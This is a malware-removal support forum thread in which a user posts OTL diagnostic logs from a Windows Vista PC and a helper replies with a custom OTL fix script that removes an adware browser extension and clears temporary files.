[2014/03/25 10:45:19 | 000,003,680 | ---- | M] () -- C:\Users\Alan\Desktop\page-members.php
[2014/03/25 00:50:01 | 000,011,691 | ---- | M] () -- C:\Users\Alan\Desktop\411ce1_home_office_100.jpg
[2014/03/24 15:19:22 | 000,003,895 | ---- | M] () -- C:\Users\Alan\Desktop\small-nav-icon.png
[2014/03/22 17:30:10 | 000,010,434 | ---- | M] () -- C:\Users\Alan\Desktop\777coin.png
[2014/03/21 02:51:51 | 000,091,352 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/03/21 01:51:15 | 000,000,085 | ---- | M] () -- C:\Windows\wininit.ini
[2014/03/21 01:29:24 | 005,290,840 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/03/15 20:07:56 | 000,000,808 | ---- | M] () -- C:\Users\Public\Desktop\Audacity.lnk
[2014/03/14 17:38:44 | 000,002,499 | ---- | M] () -- C:\Users\Public\Desktop\Skype.lnk
[2014/03/14 03:32:06 | 000,000,766 | ---- | M] () -- C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tracker.lnk
[2014/03/03 18:45:31 | 000,000,600 | ---- | M] () -- C:\Users\Alan\AppData\Roaming\winscp.rnd
[2014/02/27 03:02:23 | 000,748,424 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014/02/27 03:02:23 | 000,637,216 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/02/27 03:02:23 | 000,120,722 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/02/27 03:02:15 | 000,748,424 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[3 C:\Windows\SysWow64\*.tmp files -> C:\Windows\SysWow64\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/03/28 14:55:18 | 000,003,933 | ---- | C] () -- C:\Users\Alan\Desktop\terms-in-comments.php
[2014/03/28 14:00:51 | 000,365,691 | ---- | C] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.49.56 AM.png
[2014/03/28 13:52:37 | 000,216,089 | ---- | C] () -- C:\Users\Alan\Desktop\Futura Font.zip
[2014/03/28 13:15:15 | 000,533,740 | ---- | C] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.14.22 AM.png
[2014/03/27 23:29:08 | 000,002,804 | ---- | C] () -- C:\Users\Alan\Desktop\bg.jpg
[2014/03/27 23:23:44 | 000,025,539 | ---- | C] () -- C:\Users\Alan\Desktop\bg.png
[2014/03/27 21:18:45 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-checkout.php
[2014/03/27 19:58:58 | 000,007,276 | ---- | C] () -- C:\Users\Alan\Desktop\images.jpg
[2014/03/27 19:07:15 | 001,431,354 | ---- | C] () -- C:\Users\Alan\Desktop\EmailNinja.pdf
[2014/03/27 18:51:14 | 000,000,416 | ---- | C] () -- C:\Users\Alan\Desktop\close.png
[2014/03/27 18:51:06 | 000,000,715 | ---- | C] () -- C:\Users\Alan\Desktop\open.png
[2014/03/27 17:08:02 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\sidebar.php
[2014/03/27 16:21:29 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-speed-service.php
[2014/03/27 16:21:18 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-faq.php
[2014/03/27 16:21:10 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-custom-enquiry.php
[2014/03/27 16:20:54 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-contact.php
[2014/03/26 21:28:59 | 001,713,132 | ---- | C] () -- C:\Users\Alan\Desktop\salesvideo.wmv
[2014/03/26 21:10:11 | 000,012,208 | ---- | C] () -- C:\Users\Alan\Desktop\google-page-speed.png
[2014/03/26 21:08:46 | 000,232,310 | ---- | C] () -- C:\Users\Alan\Desktop\new-google-logo-knockoff.png
[2014/03/26 21:07:22 | 000,004,881 | ---- | C] () -- C:\Users\Alan\Desktop\google-pagespeed-logo.png
[2014/03/26 21:03:10 | 000,005,210 | ---- | C] () -- C:\Users\Alan\Desktop\gtmetrix.png
[2014/03/26 19:44:24 | 000,008,033 | ---- | C] () -- C:\Users\Alan\Desktop\progress.gif
[2014/03/26 18:11:56 | 004,535,820 | ---- | C] () -- C:\Users\Alan\Desktop\TAXZONE PLUS Features Walk Through.pdf
[2014/03/26 15:08:26 | 000,010,609 | ---- | C] () -- C:\Users\Alan\Desktop\scope_square-940x940.jpg
[2014/03/26 15:08:16 | 000,013,706 | ---- | C] () -- C:\Users\Alan\Desktop\2013-10-31-12.40.23-940x702.jpg
[2014/03/26 15:08:07 | 000,009,617 | ---- | C] () -- C:\Users\Alan\Desktop\photo26.jpg
[2014/03/26 15:07:58 | 000,015,124 | ---- | C] () -- C:\Users\Alan\Desktop\keyboard.jpg
[2014/03/26 15:07:47 | 000,011,675 | ---- | C] () -- C:\Users\Alan\Desktop\wordpress-logo-square.png
[2014/03/26 15:05:18 | 000,325,635 | ---- | C] () -- C:\Users\Alan\Desktop\2012-04-05-11.46.04.jpg
[2014/03/26 14:15:14 | 000,021,787 | ---- | C] () -- C:\Users\Alan\Desktop\screen.jpg
[2014/03/26 12:36:12 | 000,061,571 | ---- | C] () -- C:\Users\Alan\Desktop\RobInvoice.jpg
[2014/03/26 12:19:18 | 000,546,475 | ---- | C] () -- C:\Users\Alan\Desktop\hometopbg.jpg
[2014/03/26 12:15:30 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-prayer-wall.php
[2014/03/25 17:01:22 | 001,179,320 | ---- | C] () -- C:\Users\Alan\Desktop\171281.zip
[2014/03/25 17:01:00 | 001,157,816 | ---- | C] () -- C:\Users\Alan\Desktop\171281.rar
[2014/03/25 16:25:35 | 000,053,594 | ---- | C] () -- C:\Users\Alan\Desktop\six.jpg
[2014/03/25 15:17:41 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\squeeze-page-3.php
[2014/03/25 12:02:15 | 000,000,260 | ---- | C] () -- C:\Users\Alan\Desktop\.htaccess
[2014/03/25 11:44:53 | 000,136,974 | ---- | C] () -- C:\Users\Alan\Desktop\style.css
[2014/03/25 11:39:36 | 000,019,846 | ---- | C] () -- C:\Users\Alan\Desktop\footerbg.png
[2014/03/25 11:22:27 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\page-home.php
[2014/03/25 11:20:34 | 000,000,000 | ---- | C] () -- C:\Users\Alan\Desktop\new.css
[2014/03/25 10:45:19 | 000,003,680 | ---- | C] () -- C:\Users\Alan\Desktop\page-members.php
[2014/03/25 00:50:00 | 000,011,691 | ---- | C] () -- C:\Users\Alan\Desktop\411ce1_home_office_100.jpg
[2014/03/24 15:19:21 | 000,003,895 | ---- | C] () -- C:\Users\Alan\Desktop\small-nav-icon.png
[2014/03/22 17:30:10 | 000,010,434 | ---- | C] () -- C:\Users\Alan\Desktop\777coin.png
[2014/03/21 01:52:24 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2014/03/21 01:52:24 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2014/03/21 01:52:24 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe
[2014/03/21 01:52:24 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe
[2014/03/21 01:52:24 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe
[2014/03/21 01:51:10 | 000,000,085 | ---- | C] () -- C:\Windows\wininit.ini
[2014/03/15 20:07:56 | 000,000,820 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk
[2014/03/15 20:07:56 | 000,000,808 | ---- | C] () -- C:\Users\Public\Desktop\Audacity.lnk
[2014/03/14 17:38:44 | 000,002,499 | ---- | C] () -- C:\Users\Public\Desktop\Skype.lnk
[2013/12/20 23:23:07 | 001,391,616 | ---- | C] () -- C:\Windows\SysWow64\ActPDF.dll
[2013/10/01 13:03:01 | 000,000,028 | ---- | C] () -- C:\Users\Alan\.gitconfig
[2013/05/23 22:28:21 | 000,001,456 | ---- | C] () -- C:\Users\Alan\AppData\Local\Adobe Save for Web 13.0 Prefs
[2013/04/25 23:32:54 | 000,748,424 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/04/25 23:32:32 | 000,000,023 | ---- | C] () -- C:\Windows\ODBCINST.INI
[2013/02/24 17:37:10 | 000,000,600 | ---- | C] () -- C:\Users\Alan\AppData\Roaming\winscp.rnd
[2012/09/02 10:59:14 | 001,036,288 | ---- | C] () -- C:\Windows\SysWow64\lxdwdrs.dll
[2012/09/02 10:59:14 | 000,081,920 | ---- | C] () -- C:\Windows\SysWow64\lxdwcaps.dll
[2012/09/02 10:59:14 | 000,069,632 | ---- | C] () -- C:\Windows\SysWow64\lxdwcnv4.dll
[2012/07/15 12:18:24 | 000,023,552 | ---- | C] () -- C:\Users\Alan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/06/08 22:25:27 | 000,000,600 | ---- | C] () -- C:\Users\Alan\AppData\Local\PUTTY.RND
[2011/05/13 13:08:58 | 000,000,680 | ---- | C] () -- C:\Users\Alan\AppData\Local\d3d9caps.dat
[2011/03/29 09:38:49 | 000,013,078 | ---- | C] () -- C:\Users\Alan\AppData\Roaming\wklnhst.dat
[2011/03/28 12:38:47 | 000,015,812 | ---- | C] () -- C:\Users\Alan\danube.zip
[2011/03/28 12:37:46 | 000,023,841 | ---- | C] () -- C:\Users\Alan\bedizen.zip
[2011/03/26 17:58:01 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
 
========== ZeroAccess Check ==========
 
[2006/11/02 15:30:40 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2012/06/08 17:59:03 | 012,899,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012/06/08 17:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/04/11 07:11:14 | 000,891,392 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\SysWow64\wbem\fastprox.dll -- [2009/04/11 06:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2008/01/21 02:50:58 | 000,513,024 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\SysWow64\wbem\wbemess.dll
 
========== LOP Check ==========
 
[2014/03/15 21:45:16 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Audacity
[2013/10/01 23:14:48 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\AVG
[2011/03/26 12:34:10 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\AVG10
[2013/12/20 22:13:01 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\com.adobe.downloadassistant.AdobeDownloadAssistant
[2014/02/05 22:05:33 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\com.elance.tracker
[2013/12/03 18:54:59 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Dropbox
[2014/03/28 16:06:38 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\FileZilla
[2013/10/01 13:51:37 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\GitHub
[2013/10/01 20:54:09 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\GoodSync
[2011/04/08 21:25:07 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Inspyder Sitemap Creator
[2013/04/25 23:37:22 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\MySQL
[2013/10/01 21:04:11 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Nico Mak Computing
[2013/04/26 13:39:49 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Notepad++
[2012/06/01 16:33:17 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\OpenOffice.org
[2013/03/25 10:56:59 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Opera
[2013/05/23 13:20:58 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\StageManager.BD092818F67280F4B42B04877600987F0111B594.1
[2012/07/21 11:10:40 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Subversion
[2012/09/06 07:02:10 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Tatara Systems
[2012/06/01 00:40:19 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Template
[2013/04/28 15:15:47 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\TuneUp Software
[2012/07/22 22:28:22 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\UBot Studio
[2014/01/22 17:09:44 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\uTorrent
[2014/02/18 10:20:56 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\WinFF
[2013/02/14 17:45:20 | 000,000,000 | ---D | M] -- C:\Users\Default\AppData\Roaming\TuneUp Software
[2013/02/14 17:45:20 | 000,000,000 | ---D | M] -- C:\Users\Default User\AppData\Roaming\TuneUp Software
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 120 bytes -> C:\ProgramData\TEMP:D5AD7675
 
< End of report >
 
Link to post
Share on other sites
Maniac

Maniac

Posted
Posted

Run OTL

  • Under the Custom Scans/Fixes box at the bottom, paste in the following

    :OTL

    FF - prefs.js..browser.search.defaultenginename,S: S", ""

    FF - prefs.js..browser.search.order.1: ""

    FF - prefs.js..browser.search.order.1,S: S", ""

    FF - prefs.js..browser.search.selectedEngine,S: S", ""

    [2014/02/12 21:00:40 | 000,000,000 | ---D | M] (YoTuBerAddsRemoVu) -- C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\extensions\tafo@oescgz.org

    CHR - Extension: YoTuBerAddsRemoVu = C:\Users\Alan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mggdnalmmmoogbjpihpbafcjfmoppdkk\2.4_0\

    [2014/01/22 17:09:44 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\uTorrent

    :files

    ipconfig /flushdns /c

    :Commands

    [emptytemp]

  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done
  • Please post the OTL fix log in your next reply.
Note: A copy of an OTL fix log is saved in a text file at C:\_OTL\MovedFiles
Link to post
Share on other sites
alancarrr1

alancarrr1

Posted
  • Author
Posted

Here is the Extras.Txt

 

OTL Extras logfile created on: 28/03/2014 16:07:42 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Alan\Desktop
64bit-Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000809 | Country: United Kingdom | Language: ENG | Date Format: dd/MM/yyyy
 
3.87 Gb Total Physical Memory | 2.41 Gb Available Physical Memory | 62.28% Memory free
7.95 Gb Paging File | 5.62 Gb Available in Paging File | 70.63% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 451.62 Gb Total Space | 247.92 Gb Free Space | 54.90% Space Free | Partition Type: NTFS
Drive D: | 14.14 Gb Total Space | 1.92 Gb Free Space | 13.55% Space Free | Partition Type: NTFS
 
Computer Name: ALAN-PC | User Name: Alan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.html[@ = Opera.HTML] -- C:\Program Files (x86)\Opera\Opera.exe (Opera Software)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.html [@ = Opera.HTML] -- C:\Program Files (x86)\Opera\Opera.exe (Opera Software)
 
[HKEY_USERS\S-1-5-21-465606687-3642172284-1488456202-1000\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Opera\Opera.exe" "%1" (Opera Software)
https [open] -- "C:\Program Files (x86)\Opera\Opera.exe" "%1" (Opera Software)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Opera\Opera.exe" "%1" (Opera Software)
https [open] -- "C:\Program Files (x86)\Opera\Opera.exe" "%1" (Opera Software)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"UacDisableNotify" = 0
"InternetSettingsDisableNotify" = 0
"AutoUpdateDisableNotify" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = 9F 9E 16 8C DC 5B C8 01  [binary data]
"VistaSp2" = 05 E8 16 0A 64 11 CC 01  [binary data]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"oobe_av" = 1
 
========== System Restore Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0B14EC29-05CE-4055-996C-2704A19B5434}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 | 
"{0FA94DFF-9D8F-4A85-86EE-C9A128D8837F}" = lport=445 | protocol=6 | dir=in | app=system | 
"{299230F4-9AD1-480C-84C9-756E9EFBB42E}" = rport=138 | protocol=17 | dir=out | app=system | 
"{3D18C346-3705-427F-8978-0365603FC6F7}" = lport=3306 | protocol=6 | dir=in | name=port 3306 | 
"{3D20804A-0C3C-4825-839A-5E15F4A31254}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe | 
"{3E935899-21FF-457C-ACD6-2EAD888E2257}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe | 
"{6E7B3BC4-F55F-4B41-84DD-8BF9350208E5}" = lport=139 | protocol=6 | dir=in | app=system | 
"{7D9D76F2-E432-486B-B98D-6FA923D9C6B4}" = rport=139 | protocol=6 | dir=out | app=system | 
"{8502597B-2792-463D-B9C7-5F2A8DA386F1}" = lport=137 | protocol=17 | dir=in | app=system | 
"{8A6DF4D9-3672-410C-8E39-8F4D74E7D1A1}" = rport=137 | protocol=17 | dir=out | app=system | 
"{960284B3-F3DD-4FB2-95CB-74B08DB2772E}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{9865A2BE-262B-44C9-AC25-D938E2D81C4B}" = lport=138 | protocol=17 | dir=in | app=system | 
"{9A208D2F-9734-4576-A36A-8E7D759BC271}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{A9BBB353-CEE6-4E28-9644-4E495BA7A8C6}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe | 
"{ADA914F3-7A93-410E-8B3F-6EB94A0E70E9}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe | 
"{B1DE4EAE-A611-4245-9DCA-A35536A0B2F0}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{C28D95FF-F6EA-4D0E-981B-346E7B54745D}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{CA75102F-8D05-415B-8E7B-F91945E285B3}" = lport=6004 | protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office12\outlook.exe | 
"{CE05F875-FA40-4D4C-8D11-3B4D07E8D9C7}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{FB7AFD5A-0F1F-4F2B-B493-7AB53EECD980}" = rport=445 | protocol=6 | dir=out | app=system | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0612832C-7687-4178-A9F7-6B0B011B53B9}" = protocol=17 | dir=in | app=c:\windows\system32\lxdwcoms.exe | 
"{0AC8AEBA-7BA6-4B0B-8EEA-3511EE801D92}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg10\avgmfapx.exe | 
"{0E64F9D9-393A-498D-878D-172E6C37F9A9}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{11806196-10C1-4657-99B0-47BFD28B0AFA}" = protocol=6 | dir=in | app=c:\users\alan\appdata\roaming\utorrent\utorrent.exe | 
"{11BF93CC-5121-47DB-A743-754EF45E47C3}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe | 
"{1A53FE47-99DC-4221-BBF7-CC3601BB18F5}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{1B36B17F-E53E-40BB-ADD0-734D9B4062A7}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 | 
"{28B51B18-72A1-42E3-9A7B-5BD28E1A9FEF}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe | 
"{2A926A0D-8AD7-4B56-848E-D617560AB89D}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office12\groove.exe | 
"{30308EA9-6875-4BDE-8AF0-24E8FA3AC7E3}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg10\avgnsa.exe | 
"{31BFE311-F547-4036-86E5-E3A4C7762F05}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg10\avgdiagex.exe | 
"{35EC6DEB-DE08-4214-8FC5-BBF306356285}" = protocol=6 | dir=in | app=c:\windows\system32\lxdwcoms.exe | 
"{3B281A6A-E311-4ABF-A83E-C07AE61F3235}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{446A008A-0ACF-4AA2-B385-E26736C20423}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe | 
"{4853E2EB-B626-46F2-9300-3A07DA20C475}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 | 
"{4BE9A37F-A924-4735-A141-565E328452D5}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe | 
"{5692A342-9BBB-45BD-9279-A892661D3679}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{5A588F6A-8E2E-45AB-845E-317ADFEB6441}" = protocol=6 | dir=in | app=c:\program files (x86)\opera\opera.exe | 
"{5D33DA63-F658-47A8-9051-6798B791AA81}" = dir=in | app=c:\program files (x86)\cyberlink\powerdirector\pdr.exe | 
"{5F322D9C-8972-496E-A4CB-4361B5A4DB95}" = protocol=6 | dir=in | app=c:\users\alan\appdata\roaming\dropbox\bin\dropbox.exe | 
